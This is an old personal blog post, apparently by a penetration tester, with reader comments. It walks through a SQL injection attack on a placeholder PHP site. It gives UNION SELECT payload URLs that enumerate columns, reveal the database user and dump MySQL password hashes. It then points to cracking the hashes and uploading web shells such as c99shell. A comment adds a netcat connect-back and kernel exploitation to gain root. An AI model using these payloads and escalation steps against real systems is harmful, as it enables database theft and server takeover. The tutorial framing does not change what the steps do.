what i do?

Am an Information Risk Consultant and Penetration Tester, i specialize mostly in penetrating secure networks/computer systems where i simulate an organized professional attack against your organization, where after that a detailed report with weakness and exploited vectors are summarized. This will help you gain control over your infrastructures security and maximize your protection.

Wednesday, April 18, 2007

SQL INJECTIONS

This is a vulnerability alot of hackers use, when attacking webservers. By webservers in mean, applications running IIS or Apache, which are commonly used for hosting sites. This attack simply allows an attacker to alter backend SQL statements by manipulating the user input. To learn more about sql injection, there ara alot of white papers on the net that can really help. See these pages,

http://www.acunetix.com/websitesecurity/sql-injection.htm


http://www.securiteam.com/securityreviews/5NP011FIUG.html

http://www.securiteam.com/securityreviews/5IP030K8AA.html

http://unixwiz.net/techtips/sql-injection.html

http://www.owasp.org/index.php/PHP_Top_5

And many others online

lets take an example on php, aite?

Let say our site is www.sitevulnerable.com/index.php
Index php is vulnerable to sql injection. So how would we attack. www.sitevulnerable.com/index.php?id=-1

Maybe u are asking me why 1, you can use any number 1010101, wateva

The inject above may give an error, and actually these errors are the one i will use to pick up passwords, tables etc.

So we go on by enumerating the tables

www.sitevulnerable.com/index.php?id=-1 union select 1/*

We are using /* to close the query so as to grep in db.

So we will continue adding up like this until we get an output that will help us.

www.sitevulnerable.com/index.php?id=-1 union select 1,2/*

Remember with this we are just grep db of id 1, which probably is root

www.sitevulnerable.com/index.php?id=-1 union select 4,3,2,1/*

and then i get an error like

3

1


We are still rolling........

So i will inject a crafted query like this


www.sitevulnerable.com/index.php?id=-1union select 4,DATABASE(),2,USER()/*

And the error i get will be the user name in the DB.

root@localhost

So lets grep the password from the db

www.sitevulnerable.com/index.php?id=-1 union select host,host,2,password from mysql.user/*

And our error is

localhost

500372d40e775a87

Now that is an encrypted mysql hash, which can be bruteforced by using john the ripper.

Download from here


http://www.openwall.com/john/

So if i get the password, how will i log in to db and upload my files?

Simple, get a running shell, like c99shell, c100, r57 etc etc, they are all over the internet

A simple screenshot is done below.







Hope this helped, signing off,

/Chuks

3 comments:

Michuki said...

Its possible to perform this hack - am wondering what the success rate would be if the connection to the DB is allowed only from the local host 127.0.0.1 with the appropriate filters at the router level to dissable spoofing?. How would the application be able to log on remotely?.

Chuks said...

If there is a connection, u will log in with username, dname and ip to the server, and control the whole box. Sometimes there are limitations due to filters, or any type of firewalling from the box, so we end up doing a connect back using the webshell, due netcat, and build up a kernel exploitation which we end up owning root.

Michuki said...

My point exactly; Mysql if well setup should not allow connections from the Ethernet Interface if they do thats a vulnerability. In essence allow connections from the localhost loopback address or only allow the connection from a specific host in the DB_users. That way connections from other sources unless spoofed will fail. So yeah, passwordz can be found but access will be limited.

Another option is to run the apps - apache et al in a sandbox of course this will make it impossible for the hacker to get in.

But good info on your web. Keep it up.